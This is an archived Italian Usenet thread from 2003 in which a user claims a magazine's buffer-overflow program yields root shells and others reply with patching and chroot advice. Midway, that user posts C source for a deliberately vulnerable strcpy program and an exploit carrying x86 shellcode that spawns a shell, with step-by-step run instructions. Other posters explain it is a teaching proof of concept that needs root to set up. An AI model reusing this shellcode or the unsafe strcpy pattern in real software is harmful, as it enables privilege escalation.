Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

buffer overflow

6 views
Skip to first unread message

1700

unread,
Jun 12, 2003, 5:08:41 PM6/12/03
to
Con il trucco del buffer overflow qualsiasi utente puo' "saltare" tutti
i permessi e diventare root.
Quindi in un sistema con 300 utenti ad esempio vai a cercare chi e' stato !
Magari mette fuori uso la macchina cosi' non e' possibile neanche
rintracciarlo !
Ma e' possibile che succeda una cosa del genere oppure e' possibile
prendere precauzioni ?

Grazie

1700

CtRiX

unread,
Jun 12, 2003, 8:11:50 PM6/12/03
to

I buffer overflow sono una delle tecniche per ottenere delle shell, non č
detto che siano shell di root.
Tutti i programmi imho hanno dei buffer overflow, dovuti a scarse
precauzioni nel codice.
Tutto sta a scoprirli e a farli funzionare, visto che un eseguibile
compilato su una macchina non č detto che sia uguale ad un altro compilato
su un'altr a macchina.

Queste cose succedono SPESSISSIMO con windows e le sue cagate di
programmi...
Succedono ovviamente anche con linux, solo che un buon amministratore sa
come prevenire queste cose, aggiornando i pacchetti, chroottando e facendosi
leparanoie del caso.

Un buon libro non ti farebbe male per approfondire...

Max


rez

unread,
Jun 12, 2003, 8:40:21 PM6/12/03
to
On Fri, 13 Jun 2003 02:11:50 +0200, CtRiX wrote:

>I buffer overflow sono una delle tecniche per ottenere delle shell, non ш


>detto che siano shell di root.

[...]


>Queste cose succedono SPESSISSIMO con windows e le sue cagate di
>programmi...
>Succedono ovviamente anche con linux, solo che un buon amministratore sa
>come prevenire queste cose, aggiornando i pacchetti, chroottando e facendosi
>le paranoie del caso.

Potresti dire come e quando serve dare chroot per la sicurezza?

>Un buon libro non ti farebbe male per approfondire...

Esempio?
Io ho "Massima sicurezza" di anonimo (Antirez?), ma di chroot
non ne parla:-(

--
Ciao, | Attenzione! campo "Reply-To:" alterato ;^)
Remigio Zedda | E-mail: remi...@tiscali.it

-- Linux 2.4.18 su Debian GNU/Linux 3.0 "Woody"

Ottavio Campana

unread,
Jun 13, 2003, 2:30:12 AM6/13/03
to
On Thu, 12 Jun 2003 21:08:41 +0000, 1700 wrote:
> Ma e' possibile che succeda una cosa del genere oppure e' possibile
> prendere precauzioni ?

installa gli aggiornamenti di sicurezza e ridurrai le possibilità che
accada

1700

unread,
Jun 13, 2003, 7:34:53 AM6/13/03
to

CtRiX wrote:
>
> I buffer overflow sono una delle tecniche per ottenere delle shell, non č
> detto che siano shell di root.

Possono comunque essere anche shell di root

> Tutti i programmi imho hanno dei buffer overflow, dovuti a scarse
> precauzioni nel codice.
> Tutto sta a scoprirli e a farli funzionare, visto che un eseguibile
> compilato su una macchina non č detto che sia uguale ad un altro compilato
> su un'altr a macchina.

Io ho provato un programma che avvia una shell di root su tre macchine
che utilizzo quotidianamente, ed ha funzionato su tutte e tre !
Una Debian con PII 350, una slack con celeron 700 ed una suse con PII 400.

> Succedono ovviamente anche con linux, solo che un buon amministratore sa
> come prevenire queste cose, aggiornando i pacchetti, chroottando e facendosi
> leparanoie del caso.

Dunque il modo per rimediare e' secondo te utilizzare chroot.
Potresti farmi un esempio?

Grazie


1700

nicola scolari

unread,
Jun 13, 2003, 8:10:58 AM6/13/03
to
CtRiX wrote:
> Succedono ovviamente anche con linux, solo che un buon amministratore sa
> come prevenire queste cose, aggiornando i pacchetti, chroottando e facendosi
> leparanoie del caso.

Ci sono anche daemon che non vengono lanciati come root e questo limita
i danni...

Ciao
Scola

Vincenzo Valvano

unread,
Jun 13, 2003, 9:43:57 AM6/13/03
to
1700 ha scritto:
...

> Io ho provato un programma che avvia una shell di root su tre macchine
> che utilizzo quotidianamente, ed ha funzionato su tutte e tre !
> Una Debian con PII 350, una slack con celeron 700 ed una suse con PII 400.

La Debian è aggiornata con i security update?
Qual'è il nome del programma ?
('ssh' o 'telnet' non sono risposte valide :D)

--
Vincenzo

Maurizio - Tannoiser

unread,
Jun 13, 2003, 9:33:32 AM6/13/03
to
On Fri, 13 Jun 2003 11:34:53 GMT, 1700 wrote:
> Io ho provato un programma che avvia una shell di root su tre macchine
> che utilizzo quotidianamente, ed ha funzionato su tutte e tre !
> Una Debian con PII 350, una slack con celeron 700 ed una suse con PII 400.

Tu hai provato un exploit, per una debolezza _nota_ di cui non hai
provveduto ad aggiornare - patchare. Per forza che "funziona".
L'alternativa e` che tu abbia dei private/0day. come dire...

Tiro anche ad indovinare: ptrace.

Peccato che patch, e pacchetti, siano fuori da marzo. Se non tieni
aggiornato il software, il problema e` a monte.

--
Maurizio - Tannoiser - Lemmo
Founder Member of ERLUG http://erlug.linux.it
-------------------------------------------------------------------------------
These opinions are my own, though for a small fee they be yours too.

Piergiorgio Sartor

unread,
Jun 13, 2003, 9:49:29 AM6/13/03
to
1700 wrote:
> Con il trucco del buffer overflow qualsiasi utente puo' "saltare" tutti
> i permessi e diventare root.

Non e` cosi` deterministico.

> Ma e' possibile che succeda una cosa del genere oppure e' possibile
> prendere precauzioni ?

Come detto, non e` cosi` deterministico,
dipende dai programmi che girano, dal
kernel, etc.

bye,

--
Piergiorgio Sartor

1700

unread,
Jun 13, 2003, 12:10:46 PM6/13/03
to

Vincenzo Valvano wrote:
>
> La Debian è aggiornata con i security update?
> Qual'è il nome del programma ?

Si, con apt-get .....

> ('ssh' o 'telnet' non sono risposte valide :D)
>


ssh o telnet non c'entrano, ho copiato "paro paro" il programma
contenuto in un articolo di Linux Magazine del mese di giugno.

1700

1700

unread,
Jun 13, 2003, 12:11:26 PM6/13/03
to

Maurizio - Tannoiser wrote:
> Peccato che patch, e pacchetti, siano fuori da marzo. Se non tieni
> aggiornato il software, il problema e` a monte.
>

La risposta e' sopra.

1700

Gian Luca Sole

unread,
Jun 13, 2003, 12:28:03 PM6/13/03
to

1700 wrote:

> Vincenzo Valvano wrote:
> >
> > La Debian è aggiornata con i security update?
> > Qual'è il nome del programma ?
>
> Si, con apt-get .....

Qual'e' il nome del programma che hai usato per ottenere shell di root?

bye G.L.

--
La logica non attiene alla verosimiglianza delle ipotesi,
ma alla coerenza delle tesi con le ipotesi.


Maurizio - Tannoiser

unread,
Jun 13, 2003, 12:34:35 PM6/13/03
to
On Fri, 13 Jun 2003 16:11:26 GMT, 1700 wrote:
>> Peccato che patch, e pacchetti, siano fuori da marzo. Se non tieni
>> aggiornato il software, il problema e` a monte.
>
> La risposta e' sopra.

anche la mia.

_qui_ sopra.

--
Maurizio - Tannoiser - Lemmo
Founder Member of ERLUG http://erlug.linux.it
-------------------------------------------------------------------------------

It must be in the basement; I'll go upstairs and get it. M.C.Escher

test

unread,
Jun 13, 2003, 2:13:35 PM6/13/03
to
1700:

> e' possibile
> prendere precauzioni ?
>
Oltre a quello che ti hanno consigliato gli altri dai un occhiata qui:

http://www.adamantix.org/

Alessandro.


Kronos

unread,
Jun 13, 2003, 3:04:44 PM6/13/03
to
rez <r...@rez.localhost> ha scritto:

>>Succedono ovviamente anche con linux, solo che un buon amministratore sa
>>come prevenire queste cose, aggiornando i pacchetti, chroottando e facendosi
>>le paranoie del caso.
>
> Potresti dire come e quando serve dare chroot per la sicurezza?

Quando sono in gioco servizi a "rischio" (bind, apache, cvs, ...). Si
crea in pratica un ambiente (jail) minimale (ie. libreria C, file di
configurazione, i device necessari, et similia) in cui far girare il
servizio. Nel caso questo venisse violato non potrebbe comunque agire
all'esterno dall'ambiente che gli e` stato preparato (jail, prigione) e
non potrebbe compromettere il resto del sistema.

ciao
Kronos
--
Home: http://kronoz.cjb.net
Windows NT: Designed for the Internet. The Internet: Designed for Unix.

1700

unread,
Jun 13, 2003, 4:18:56 PM6/13/03
to

Kronos wrote:
> Quando sono in gioco servizi a "rischio" (bind, apache, cvs, ...). Si
> crea in pratica un ambiente (jail) minimale (ie. libreria C, file di
> configurazione, i device necessari, et similia) in cui far girare il
> servizio. Nel caso questo venisse violato non potrebbe comunque agire
> all'esterno dall'ambiente che gli e` stato preparato (jail, prigione) e
> non potrebbe compromettere il resto del sistema.

Quello che dici mi piace molto, ma non dici come preparare tale "jail".

Bye

1700

1700

unread,
Jun 13, 2003, 4:24:07 PM6/13/03
to

Gian Luca Sole wrote:
> Qual'e' il nome del programma che hai usato per ottenere shell di root?
>

Su Linux Magezine di giugno.

Comunque nessuno mi ha detto ancora come evitare che questo programma
trovato su linux magazine possa assumere i privilegi di root !

Il programma "exploit" funziona a meraviglia !
Ho scritto anche su /sbin !

Addirittura funziona su partizioni montate come nosuid, ma +non+
funziona su partizioni montate come noexec, forse questa e' la chiave
della sicurezza

ciao

1700

Skull

unread,
Jun 13, 2003, 4:33:04 PM6/13/03
to
Sgranocchiando il cranio di 1700, vi trovai inciso:

Al di là del fatto che tu l'abbia o no trovato nelle patatine, se non
dici *cosa* stai exploitando è difficile dirti come non farlo
exploitare...

--
Emanuele Balla aka Skull - Public Key #661E5CBF on www.keyserver.com
+----------------------------------------------------------------------+
"And 1.1.81 is officially BugFree(tm), so if you receive any bug-reports
on it, you know they are just evil lies." (By Linus Torvalds)

1700

unread,
Jun 13, 2003, 5:51:53 PM6/13/03
to

Skull wrote:
> Al di là del fatto che tu l'abbia o no trovato nelle patatine, se non
> dici *cosa* stai exploitando è difficile dirti come non farlo
> exploitare...
>

Leggi tutto il thread che capisci ... considera che non amo le patatine ....

Comunque lo ripeto:
chiunque, un qualunque utente, eseguendo un programmino di 50 righe
assume i privilegi di root ed ha una shell con cui fare danni in giro.

Volete che vi mandi i due file cosi' li provate? Magari mentre mangiate
le patatine :-)

Ciao


1700

Vincenzo Valvano

unread,
Jun 13, 2003, 6:15:45 PM6/13/03
to
1700 ha scritto:
...

> chiunque, un qualunque utente, eseguendo un programmino di 50 righe
> assume i privilegi di root ed ha una shell con cui fare danni in giro.

Hai aggiornato il kernel? Debian ha pubblicato un 'Security Advisory' al
riguardo l'8 di questo mese. Se hai un kernel scaricato in precedenza
aggiornalo, qui trovi le istruzioni:

http://www.debian.org/security/2003/dsa-311

--
Vincenzo

nero

unread,
Jun 13, 2003, 4:43:14 PM6/13/03
to
> Quello che dici mi piace molto, ma non dici come preparare tale "jail".

man chroot

ciao.

Maurizio - Tannoiser

unread,
Jun 13, 2003, 8:49:55 PM6/13/03
to
On Fri, 13 Jun 2003 21:51:53 GMT, 1700 wrote:
> chiunque, un qualunque utente, eseguendo un programmino di 50 righe
> assume i privilegi di root ed ha una shell con cui fare danni in giro.

NO.

Un qualunque utente esegue un programma che sfrutta una _debolezza_ del
tuo sistema. Il problema e` "la debolezza del tuo sistema", non il
"programma".

E con questo, fanno *tre* volte che te lo scrivo.

> Volete che vi mandi i due file cosi' li provate? Magari mentre mangiate
> le patatine :-)

vuoi scommettere che sulle _mie_ macchine, il *tuo* file non exploita?
Patatine comprese?

--
Maurizio - Tannoiser - Lemmo
Founder Member of ERLUG http://erlug.linux.it
-------------------------------------------------------------------------------

Be afraid if you see a programmer with a screwdriver.

Fabrizio Cattaneo

unread,
Jun 14, 2003, 4:04:26 AM6/14/03
to
> Skull wrote:
> > Al di là del fatto che tu l'abbia o no trovato nelle patatine, se non
> > dici *cosa* stai exploitando è difficile dirti come non farlo
> > exploitare...
> >
>
> Leggi tutto il thread che capisci ... considera che non amo le patatine
....
>

Forse avete usato un linguaggio che non capisco.... comunque io ho riletto 3
volte tutti i tread e non'ho capito un C.

Vista la reticenza a fornire informazioni ''in chiaro'' su questo argomento
dimmi almeno se l'exploit funziona solamente se si e' utenti locali della
macchina target.

Grazie,
F.


1700

unread,
Jun 14, 2003, 4:45:56 AM6/14/03
to
Maurizio - Tannoiser wrote:
>
> vuoi scommettere che sulle _mie_ macchine, il *tuo* file non exploita?
> Patatine comprese?
>

La gente che ha tutta la tua sicurezza e' quella che per prima viene
attaccata, e scusa se mi sono permesso, ma la modestia e' fondamentale
quando si parla di argomenti scientifici. Nessuno di noi e' un guru !

1700

Ikitt

unread,
Jun 14, 2003, 5:36:22 AM6/14/03
to
Sat, 14 Jun 2003 08:45:56 GMT <1700>: "Re: buffer overflow"

> La gente che ha tutta la tua sicurezza e' quella che per prima viene
> attaccata,

La seconda. La prima e` quella che non aggiorna il software con bachi
di sicurezza noti.
A volte le due categorie coincidono.

E, per inciso, per quel poco che mi e` dato sapere leggendolo su usenet,
non mi sembra affatto che Maurizio - Tannoiser rientri in nessuna delle due.

+++

Se non vuoi dire su quale porgramma si basa questo famoso exploit, potresti
almeno postare il codice? Non compro e non saprei dove trovare la rivista
che citi, e a questo punto sono curioso.

--
Ikitt che alla magia nera ci crede poco. *** mailserver: freemail.it
"Se si sa usare solo il martello, tutti i problemi sembrano chiodi"
"Studiare senza pensare, inutile. Pensare senza studiare, stupido."
GNU/Linux 2003: do more with less => $ alias more=less

Maurizio - Tannoiser

unread,
Jun 14, 2003, 8:11:11 AM6/14/03
to

L'italiano, perdinci, l'italiano. Hai letto che le mie macchine non sono
attaccabili?

Ti ho detto un'altra cosa: le mie macchine non sono attaccabili da un
_qualunque_ exploit che trovi su una rivista (per giunta di qualche mese
fa).

La comprendi la differenza? Devo dedurre che non hai accettato la
scommessa?

Cancelliamo, va.

Mi permetto di darti un consiglio: qualunque distribuzione usi, di norma
ha un documento, una sezione, qualcosa, che parla di sicurezza nello
specifico della stessa. C'e` il debian-security-howto, oppure un
documento di hardening per redhat, e cosi` via.

Prima di postare con informazioni parziali, o palese assenza di esse, ti
consiglio di leggerti bene, _almeno_ quelle. Quindi _testare_ le tue
macchine (e fai benissimo).

il "buffer overflow" non e` un problema _specifico_ di una distribuzione
o di un sistema operativo. E` un errore (bug) nella scrittura di un
codice di un dato programma.

Di _norma_ il software non e` scritto _intenzionalmente_ con dei bachi,
o per lo meno, su software libero questo e` verificabile.

Di _norma_ puo` capitare che un programmatore commetta degli errori.

Di _norma_ quando qualcuno scopre un errore, (non c'e` solo il buffer
overflow, a voglia quante porcherie si possono scrivere programmando)
viene creata una patch, l'errore viene corretto. Questo e` decisamente
vero e veloce (chiunque puo` inviare una patch, non necessariamente il
programmatore del tal software) in ambito free, meno vero (o il processo
e` piu` lento e meno verificabile), in ambito closed.

Di _norma_ un amministratore accorto, segue le liste di annuncio di
bachi, debolezze, incidenti, ecc. Oltre che quelle specifiche dei propri
sistemi operativi. Non e` raro che alcuni di essi vi contribuiscano
(hints).

Per debian, ad esempio, e` _fondamentale_ la completa lettura e
_comprensione_ di questa pagina:

http://www.debian.org/security/

Oltre che, almeno, del gia` citato debian-security-howto.

L'aggiornamento del software, non e` un problema di sicurezza in senso
stretto, ma di buona amministrazione.

Se nemmeno cosi` hai capito, temo che l'amministrazione, per te, sia un
tema un po` prematuro. La sicurezza e` una _branca_ di essa, trai da te
le tue conclusioni.

ciao.

--
Maurizio - Tannoiser - Lemmo
Founder Member of ERLUG http://erlug.linux.it
-------------------------------------------------------------------------------

God is real, unless declared integer

Maurizio - Tannoiser

unread,
Jun 14, 2003, 8:13:15 AM6/14/03
to
On Sat, 14 Jun 2003 10:13:57 +0000 (UTC), tho...@despammed.com wrote:
> Posso azzardare che si tratti di una mega-colossale cazzata,
> considerata la reticenza nel volercene parlare?

Secondo me non e` reticenza. E` che ha proprio le idee confuse (e la
scarsa documentazione fa il resto).

O e` un trollone della Madonna, e noi ci siamo attaccati come dei fessi.
gh gh gh. :)

--
Maurizio - Tannoiser - Lemmo
Founder Member of ERLUG http://erlug.linux.it
-------------------------------------------------------------------------------

Grove giveth and Gates taketh away.

Fabrizio Cattaneo

unread,
Jun 14, 2003, 9:11:14 AM6/14/03
to
> Posso azzardare che si tratti di una mega-colossale cazzata,
> considerata la reticenza nel volercene parlare?
>

Ormai sono quasi certo.....
trattasi di un Troll.......

Quello che mi fa' incazzare e' che gli ho anche dato retta.

F.

1700

unread,
Jun 14, 2003, 9:14:55 AM6/14/03
to

tho...@despammed.com wrote:
>
> Posso azzardare che si tratti di una mega-colossale cazzata,
> considerata la reticenza nel volercene parlare?
>

Dato che vi dispiace spendere qualche euro per una rivista:

-----------------------------------------------

// (1700) 10/06/2003 -- buf_over.c
// da usare in combinazione con vuln.c


#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define SIZE 64

char shellcode[] = "\x31\xdb\x31\xc0\xb0\x17"
"\xcd\x80\xb0\x2e\xcd\x80"
"\x68\x2f\x73\x68\xaa\x68"
"\x2f\x62\x69\x6e\x89\xe3"
"\x31\xc0\x50\x89\xe2\x53"
"\x89\xe1\x88\x64\x24\x0f"
"\xb0\x0b\xcd\x80";

int main(int argc, char *argv[])
{

long address = atoll(argv[1]);
char *appoggio = malloc(SIZE + 1);
long *punt = (long *) appoggio;
int i;

for(i = 0; i < SIZE; i += 1)
{
*(punt++) = address;

}

for(i = 0; i < strlen(shellcode); i ++)
{
appoggio[i] = shellcode[i];

}

appoggio[SIZE] = '\0';

char *arg[3];

arg[0] = "vuln";
arg[1] = appoggio;
arg[2] = NULL;

return execve(arg[0], arg, NULL);

}

------------------------------------------------------------------------------


// (1700) 10/06/2003 -- vuln.c
// da usare in combinazione con buf_over.c


#include <unistd.h>
#include <string.h>


int main(int argc, char *argv[])
{

char buf[48];

printf("\nindirizzo: 0x%x (%u)\n", buf, buf);
strcpy(buf, argv[1]);
printf("%s\n", buf);

return 0;
}

----------------------------------------------------------------------------

Dato che siete cosi' bravi dovreste capire anche come si usano :-)

La modestia ragazzi ! La modestia !
Siamo qui per imparare.


Saluti

1700

Maurizio - Tannoiser

unread,
Jun 14, 2003, 9:59:19 AM6/14/03
to
On Sat, 14 Jun 2003 13:14:55 GMT, 1700 wrote:
> // (1700) 10/06/2003 -- buf_over.c
> // da usare in combinazione con vuln.c
>
> // (1700) 10/06/2003 -- vuln.c
> // da usare in combinazione con buf_over.c

Tu davvero non ti rendi conto, oppure sei seriamente un abilissimo
troll.

Questi sono "proof of concepts". vuln.c e` un programma _volutamente_
bacato, (l'uso improprio di strcpy), e _conseguente_ exploit per il
programma (e per altro, a occhio, c'e` quanto meno un errore, in quel
char *arg[3], mai dichiarato, ma fa lo stesso).

Questo _non_ signfica che il software nella tua distribuzione contenga
programmi _vulnerabili_.

Ma l'hai capito l'articolo della rivista, oppure no?

> Dato che siete cosi' bravi dovreste capire anche come si usano :-)

Mi aspetto da un momento all'altro che ti metta pure a sbattere i piedi.

> La modestia ragazzi ! La modestia !

eh. Non sai quanto hai ragione.

> Siamo qui per imparare.

Rotfl. Quando pensavi di iniziare?

Ps:
Se i "programmi" (chiamarli _esempi_ no, eh), li hai "trascritti" da una
rivista, perche` li "intesti" come tuoi?

--
Maurizio - Tannoiser - Lemmo
Founder Member of ERLUG http://erlug.linux.it
-------------------------------------------------------------------------------

Research is what I'm doing when I don't know what I'm doing.

test

unread,
Jun 14, 2003, 10:24:10 AM6/14/03
to
1700:

> Dato che siete cosi' bravi dovreste capire anche come si usano :-)
>
No. Troppo facile dire "non funziona perche' non sai usarlo".

L'onere della prova e' tuo.

Alessandro.
Ooops! ...segmentation fault


test

unread,
Jun 14, 2003, 10:26:16 AM6/14/03
to
tho...@despammed.com:
> moria:/tmp# gcc -o buf_over buf_over.c
> buf_over.c: In function `main':
> buf_over.c:41: parse error before `char'
> buf_over.c:43: `arg' undeclared (first use in this function)
> buf_over.c:43: (Each undeclared identifier is reported only once
> buf_over.c:43: for each function it appears in.)
>
E' che la gente scrive programmi in C++ e non lo sa...

Alessandro.


Piergiorgio Sartor

unread,
Jun 14, 2003, 10:36:23 AM6/14/03
to
1700 wrote:

> quando si parla di argomenti scientifici. Nessuno di noi e' un guru !

Ma parla, anzi scrivi, per te...

;-)

bye,

--

piergiorgio

1700

unread,
Jun 14, 2003, 11:35:42 AM6/14/03
to

test wrote:
> Alessandro.
> Ooops! ...segmentation fault
>
>

A me il programma funziona.
Il segmentation fault e' voluto perche' e' proprio quello che permette
di accedere ad una shell di root.
L'indirizzo tra parentesi che compare dovete inserirlo come comando .....
ma che ve lo spiego a fare tanto ....
Non avete capito il programma !
Non potete mettere in dubbio le capacita' di chi ha scritto l'articolo
su Linux Magazine, e' una rivista validissima !
Avete fatto una grossa cavolata !
Ma quale SEGMENTATION FAULT !
Non avete capito il programma.

rotfl

Purtroppo questo non mi sembra un newsgroup ma una comitiva di gente che
si spaccia per geni ...
Altre persone mi hanno detto di non frequentarlo piu' "perche' si
credono maestri".

Se foste cosi' bravi sareste famosi .... cosa che non mi risulta.

Vi chiedo scusa (addirittura) se vi ho recato disturbo.

1700


Paolo opg

unread,
Jun 14, 2003, 11:50:42 AM6/14/03
to
1700 <a...@at.dominio> wrote in news:3EEB4096...@at.dominio:

>
> A me il programma funziona.
> Il segmentation fault e' voluto perche' e' proprio quello che permette
> di accedere ad una shell di root.
> L'indirizzo tra parentesi che compare dovete inserirlo come comando
> ..... ma che ve lo spiego a fare tanto ....
> Non avete capito il programma !
> Non potete mettere in dubbio le capacita' di chi ha scritto l'articolo
> su Linux Magazine, e' una rivista validissima !
> Avete fatto una grossa cavolata !
> Ma quale SEGMENTATION FAULT !
> Non avete capito il programma.
>

vedendo 'sta marea di msg in un solo thread, mi aspettavo non so quale
discussione riguardo a chissachè.

alla fine, dopo essermi letto il tutto, mi pare d'aver capito una cosa:
tu hai trovato un programma creato e compilato per dimostrare un buffer
overflow, che funziona (andando in overflow, appunto).

siccome il programma è corretto (fa ciò per cui è stato studiato), tu
ritieni di aver scoperto delle gravissime falle in 3 distribuzioni che
dici di usare regolarmente.

io non sono un programmatore di professione, ma se scrivo un programmino
di esempio (quale quello che hai trovato tu) e il mio programmino crasha,
non mi azzardo a dire che la mia debian è patchata col qlo...


> rotfl
>
> Purtroppo questo non mi sembra un newsgroup ma una comitiva di gente
> che si spaccia per geni ...
> Altre persone mi hanno detto di non frequentarlo piu' "perche' si
> credono maestri".
>

nell'ultimo periodo, su diversi ng, è apparsa gente che posta domande e
vuole risposte (nota il VUOLE).
sui ng, come è già stato ripetuto inifite volte, nulla è dovuto.
chi vuole risponde, purtroppo qualcuno ha un carattere un 'pochino'
scontroso (aka di cacca...) e risponde male, qualcuno invece non risponde
per niente.

'sti novellini, quando non ottengono quello che vogliono nella forma che
vogliono (istruzioni complete e dettagliate) s'incazzano, puntano i piedi
e pretendono.
sbagliando.
leggetevi la netiquette e ripassate, grazie.

> Se foste cosi' bravi sareste famosi .... cosa che non mi risulta.
>

mah, se anche fossi famoso, non penso che sui biglietti da visita
metterei paoloopg.
tu faresti biglietti da visita con su scritto 1700?

> Vi chiedo scusa (addirittura) se vi ho recato disturbo.
>

nessun disturbo.
sei sicuro di non aver postato su un ng di livello troppo basso per il
tuo alto intelletto?
pare che l'unico ad aver capito questo 'mitico' esempio di linux magazine
sia tu...


--
+-------
| Paolo opg
|
| janickg ( at ) hotmail ( dot ) com
+-------

** Articolo inviato tramite i servizi gratuiti di www.x-privat.org **

test

unread,
Jun 14, 2003, 12:14:20 PM6/14/03
to
1700:

> Purtroppo questo non mi sembra un newsgroup ma una comitiva di gente
> che si spaccia per geni ...

...e chissa' perche' ci sei finito anche tu...

Alessandro.

Crononauta

unread,
Jun 14, 2003, 1:12:06 PM6/14/03
to
On Fri, 13 Jun 2003 20:24:07 GMT, 1700 <a...@at.dominio> wrote:
> Il programma "exploit" funziona a meraviglia !
> Ho scritto anche su /sbin !

Sì in effetti anche il mio...

$ ./buf_over
$ segmentation fault

$ su -
$ password:

# cd /sbin
# touch prova
# ls prova
prova

Hai ragione funziona! Ma se non conoscessi la password di root? :-DDD

Torna a vangare valà, tra l'altro in quei programmi che hai mandato ci
sono degli errori strutturali: una dichiarazione di un puntatore non può
seguire degli statment altrimenti il compilatore s'incazza.

Detto questo sarebbe interessante sapere come hai fatto ad eseguirli se
non si riescono a compilare...
(a parte che anche compilati - dopo aver corretto gli errori - non fanno
danni).

--
Massimo Bacilieri AKA Crononauta
ICQ:4005815

Maurizio - Tannoiser

unread,
Jun 14, 2003, 1:12:21 PM6/14/03
to
On Sat, 14 Jun 2003 15:35:42 GMT, 1700 wrote:
> Ma quale SEGMENTATION FAULT !
> Non avete capito il programma.

Ma *ROTFL*. Ti prego rimani, sei un ossimoro vivente.

--
Maurizio - Tannoiser - Lemmo
Founder Member of ERLUG http://erlug.linux.it
-------------------------------------------------------------------------------

Use SATANIX 1.0, an OS42K. When the Rapture comes, will YOU have root?

Ikitt

unread,
Jun 14, 2003, 1:27:06 PM6/14/03
to
Sat, 14 Jun 2003 15:35:42 GMT <1700>: "Re: buffer overflow"

[...]


> ma che ve lo spiego a fare tanto ....
> Non avete capito il programma !
> Non potete mettere in dubbio le capacita' di chi ha scritto l'articolo
> su Linux Magazine, e' una rivista validissima !
> Avete fatto una grossa cavolata !
> Ma quale SEGMENTATION FAULT !
> Non avete capito il programma.
>
> rotfl

Ogni dubbio e` fugato, direi.

<Cantona>
Au Revoir ^K
</Cantona>

--
Ikitt *** mailserver: freemail.it

nero

unread,
Jun 14, 2003, 11:56:34 AM6/14/03
to

> La modestia ragazzi ! La modestia !
> Siamo qui per imparare.

comincia tu , ma l' hai capito cosa fa' il programma ???

complimenti comunque , vinci la coppa dell' anno per la banda sprecata.


1700

unread,
Jun 14, 2003, 1:42:26 PM6/14/03
to

IN fondo ci sono le istruzioni per l'uso per i meno abbienti
(intellettualmente parlando):
L'unico e dico l'unico, il solo, il mitico che ha capito il problema mi
sembra "paolo opg".


Come si usa il programma :
------------------------

buf_over richiama vuln, e' necessario quindi compilare entrambi.
La compilazione NON e dico NON da errori (pensate che una rivista come
Linux Magazine possa inserire i programmi in un articolo che non
compilano !!!! No dico vi rendete conto? )

Procedete come cavalli con i paraocchi:

1 - settare il bit suid di vuln:
chmod +s vuln

2 - cambiare il proprietario ed il gruppo:
chown root.root vuln

3 - eseguire:
./buf_over indirizzo a 10 cifre
ci dara' un INDIRIZZO ed un segmentation fault
rieseguiamo mettendo INDIRIZZO come primo argomento.
(Eseguiamo eventualmente un' altra volta se non dovesse funzionare.)

fatto .....

provate a fare:
#: whoami

4 - siate piu' modesti, come "paolo opg" ad esempio

5 - vado a mangiare un po' di pesce in riva al mare mentre voi compilate :-)


Se anche adesso non funziona !!!!!!!!!!!!
Gente da guidare passo passo che si da tante arie.
Ma!

1701


1700

unread,
Jun 14, 2003, 1:43:32 PM6/14/03
to

Piergiorgio Sartor

unread,
Jun 14, 2003, 2:10:44 PM6/14/03
to
1700 wrote:

> Procedete come cavalli con i paraocchi:
>
> 1 - settare il bit suid di vuln:
> chmod +s vuln
>
> 2 - cambiare il proprietario ed il gruppo:
> chown root.root vuln

E non devi essere gia` root per fare una cosa
del genere? Per giunta insieme a "+s"?

Secondo te, se un utente potesse assegnare il
bit "s" e poi cambiare l'user dell'eseguibile
in root, non ci sarebbe gia` un problema di
sicurezza grande come una casa?
Si potrebbe, per esempio, copiare una shell a
caso ed eseguire il tutto, o no?
Salvo ulteriori sicurezze...

> 3 - eseguire:

Eseguo cosa?
"chown root.root" non funziona da utente normale!!!

bye,

--

piergiorgio

Crononauta

unread,
Jun 14, 2003, 2:18:09 PM6/14/03
to
On Sat, 14 Jun 2003 17:42:26 GMT, 1700 <a...@at.dominio> wrote:
> 1 - settare il bit suid di vuln:
> chmod +s vuln
>
> 2 - cambiare il proprietario ed il gruppo:
> chown root.root vuln

Ci prendi per il culo? Se ho l'autorità di attribuire gruppo e user
"root" nonché il bit suid, mi dici che minchia di bisogno ho di fare
queste menate per avere una shell di root? Sono GIA' root!

Maronna che minchione, e ci ho pure perso del tempo.

Maurizio - Tannoiser

unread,
Jun 14, 2003, 2:21:00 PM6/14/03
to
On Sat, 14 Jun 2003 20:10:44 +0200, Piergiorgio Sartor wrote:
> E non devi essere gia` root per fare una cosa
> del genere? Per giunta insieme a "+s"?

Dai, il povero cucciolo, non ci ha capito una mazza, lascialo stare. :)

Chissa` perche` a me non risponde piu` <Grin>.

Se fossi "burbero" come Thorin, mi metterei una sign tipo: "Non avete
capito il programma" (rotflastc).

--
Maurizio - Tannoiser - Lemmo
Founder Member of ERLUG http://erlug.linux.it
-------------------------------------------------------------------------------

Diplomacy is the ability to let someone else have your way.

Piergiorgio Sartor

unread,
Jun 14, 2003, 2:28:52 PM6/14/03
to
Maurizio - Tannoiser wrote:

> Se fossi "burbero" come Thorin, mi metterei una sign tipo: "Non avete
> capito il programma" (rotflastc).

Ma ddddddaaaaiiiii... :-)

bye,

--

piergiorgio

Paolo opg

unread,
Jun 14, 2003, 3:04:57 PM6/14/03
to
1700 <a...@at.dominio> wrote in news:3EEB5E8...@at.dominio:

>
>
> IN fondo ci sono le istruzioni per l'uso per i meno abbienti
> (intellettualmente parlando):
> L'unico e dico l'unico, il solo, il mitico che ha capito il problema
> mi sembra "paolo opg".
>

<megacut>

definendomi come l'unico che ha capito il programma, escludi anche te
stesso...
(vabbè, sto arzigogolando e facendo il bastardo coi termini,
lo so...)

>
> 1 - settare il bit suid di vuln:
> chmod +s vuln
>
> 2 - cambiare il proprietario ed il gruppo:
> chown root.root vuln
>

come t'hanno già fatto notare, se non sei root, i primi due punti non
riesci a concluderli.

> 3 - eseguire:
> ./buf_over indirizzo a 10 cifre
> ci dara' un INDIRIZZO ed un segmentation fault
> rieseguiamo mettendo INDIRIZZO come primo argomento.
> (Eseguiamo eventualmente un' altra volta se non dovesse funzionare.)
>
> fatto .....
>

impossibile, da utente normale sei rimasto bloccato ai primi due
passaggi!!!

>
> Se anche adesso non funziona !!!!!!!!!!!!
> Gente da guidare passo passo che si da tante arie.
> Ma!
>

il piccolo problema che ha generato tutta 'sta marea di morchia, sta nel
fatto che hai malinteso lo scopo del programmino.

il programmino serviva semplicemente a dimostrare che, in caso ci fosse
un eseguibile sul tuo pc/server/quelcavolocheusi con permessi di root e
suid set, un buffer overflow (errore di programmazione, solitamente)
potrebbe (nota il condizionale) rendere possibile guadagnare privilegi
elevati. quindi, per provarlo, DEVI avere l'accesso come root al sistema
